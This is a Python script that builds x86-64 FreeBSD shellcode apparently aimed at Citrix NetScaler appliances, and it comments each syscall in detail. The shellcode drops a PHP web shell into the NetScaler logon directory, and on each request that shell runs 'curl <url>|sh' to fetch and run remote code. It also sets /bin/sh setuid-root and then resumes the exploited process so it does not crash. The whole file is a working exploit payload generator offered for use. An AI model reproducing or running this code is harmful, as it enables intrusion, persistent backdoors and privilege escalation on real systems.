import os
import subprocess
import tempfile
# NASM source for the position-independent x86-64 payload that mkshellcode()
# assembles.  Two str.format() slots are filled positionally: `push {}` takes
# the fixup address, `curl {}` takes the payload URL.  Do not add literal
# braces to this text without doubling them, or .format() will reject them.
#
# Target ABI: the syscall numbers (open=5, write=4, chmod=15) and the open()
# flag word 0x0601 (O_WRONLY|O_CREAT|O_TRUNC) are FreeBSD amd64 values, not
# Linux x86-64 ones (open=2, write=1, chmod=90; flags 0x241) -- consistent
# with the NetScaler web-root path below (Citrix ADC runs on FreeBSD).  The
# same bytes do nothing useful on a Linux host.
#
# What it does, in order:
#   1. open("/var/netscaler/logon/a.php", O_WRONLY|O_TRUNC|O_CREAT, 0777)
#      -- the return value is not checked; on failure the error code is
#      carried into rdi, the write below fails, and chmod still runs.
#   2. write(fd, cmd, path1-cmd): drops a one-line PHP web shell that runs
#      `curl <payload_url> | sh` on every request.  The length is a single
#      byte (`mov dl, path1-cmd`), so the cmd string (14 fixed bytes + URL)
#      must be at most 255 bytes, and the URL sits inside a double-quoted
#      NASM `db` string, so it must not contain '"' or a line break.
#   3. chmod("/bin/sh", 0xd6d): 0xd6d is octal 06555 (setuid|setgid plus
#      r-xr-xr-x), i.e. a setuid-root /bin/sh if the exploited process runs
#      as root.  (The asm comment writes the mode as 6555; it is octal 06555.)
#   4. push <fixup>; ret: resumes execution at a caller-supplied address
#      instead of crashing.  x86-64 has no `push imm64` -- the immediate is
#      sign-extended from 32 bits, so fixup must be representable that way.
#
# NOTE(review): `mov al, 15` before chmod assumes the upper bits of rax are
# already zero; rax holds write()'s return value at that point (a byte count
# below 256, or a small errno), so this holds, but it breaks if the sequence
# is reordered.
template: str = """bits 64
; fd=open("/var/netscaler/logon/a.php", O_WRONLY|O_TRUNC|O_CREAT, 0777);
lea rdi, [rel path1]
xor eax, eax
xor edx, edx
mov al, 5 ; sys_open
xor esi, esi
mov si, 0x0601 ; O_WRONLY|O_TRUNC|O_CREAT
mov dx, 0x1ff ; 0777
syscall
; write(fd, shell, strlen(shell));
push rax
pop rdi
push 4
pop rax ; sys_write
lea rsi, [rel cmd]
xor edx, edx
mov dl, path1-cmd
syscall
; chmod("/bin/sh", 6555);
mov al, 15 ; sys_chmod
lea rdi, [rel path2]
xor esi, esi
mov si, 0xd6d ; 06555
syscall
; avoid crashing
push {}
ret
; constants
cmd:
db "<?=`curl {}|sh`;"
path1:
db "/var/netscaler/logon/a.php", 0
path2:
db "/bin/sh", 0
"""
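def mkshellcode(fixup, payload_url):
    """Assemble ``template`` with NASM and return the flat shellcode bytes.

    fixup: hex string starting with 0x (an int is also accepted), the address
        the shellcode jumps to (``push <fixup>; ret``) after it finishes.
        x86-64 has no ``push imm64``; NASM sign-extends a 32-bit immediate and
        only warns when the value does not fit, so out-of-range addresses are
        rejected here instead of being silently truncated.
    payload_url: URL baked into the dropped web shell's ``curl`` command.  It
        is placed inside a NASM double-quoted ``db`` string, so it must not
        contain a double quote or a line break, and the whole ``cmd`` string
        (14 fixed bytes + URL) must fit the single-byte write length that
        ``mov dl, path1-cmd`` encodes.

    Returns the raw output of ``nasm -f bin`` as bytes.

    Raises ValueError for an invalid fixup or payload_url, FileNotFoundError
    if ``nasm`` is not on PATH, and subprocess.CalledProcessError if NASM
    exits non-zero.
    """
    # push imm32 is sign-extended to 64 bits: only values in [-2^31, 2^31) or
    # the top 2^31 of the 64-bit space can be encoded.
    addr = fixup if isinstance(fixup, int) else int(str(fixup), 16)
    low_ok = -(1 << 31) <= addr < (1 << 31)
    high_ok = (1 << 64) - (1 << 31) <= addr < (1 << 64)
    if not (low_ok or high_ok):
        raise ValueError(
            "fixup %r does not fit a sign-extended 32-bit push immediate" % (fixup,)
        )

    # The URL lands inside a double-quoted db string: a quote ends the string
    # early and a line break would let the caller inject assembler directives.
    if any(ch in payload_url for ch in '"\r\n'):
        raise ValueError("payload_url must not contain '\"' or line breaks")

    # write() length is `mov dl, path1-cmd` -- one byte.  The fixed part of the
    # cmd string ('<?=`curl |sh`;') is 14 bytes; NASM would truncate a longer
    # length to 8 bits with just a warning and the web shell would be cut short.
    cmd_len = len("<?=`curl |sh`;") + len(payload_url.encode("utf-8"))
    if cmd_len > 0xFF:
        raise ValueError(
            "payload_url too long: cmd string is %d bytes, max 255" % cmd_len
        )

    asm = template.format(fixup, payload_url)
    with tempfile.TemporaryDirectory() as tmpd:
        src = os.path.join(tmpd, "shellcode.S")
        out = os.path.join(tmpd, "shellcode")
        with open(src, "w", encoding="utf-8") as f:
            f.write(asm)
        # Argument list instead of a shell string; -f bin is what NASM defaults
        # to without -f, and -o pins the output name rather than relying on
        # extension stripping.  check=True surfaces assembler errors instead of
        # a confusing FileNotFoundError when reading the missing output.
        subprocess.run(["nasm", "-f", "bin", "-o", out, src], check=True)
        with open(out, "rb") as f:
            return f.read()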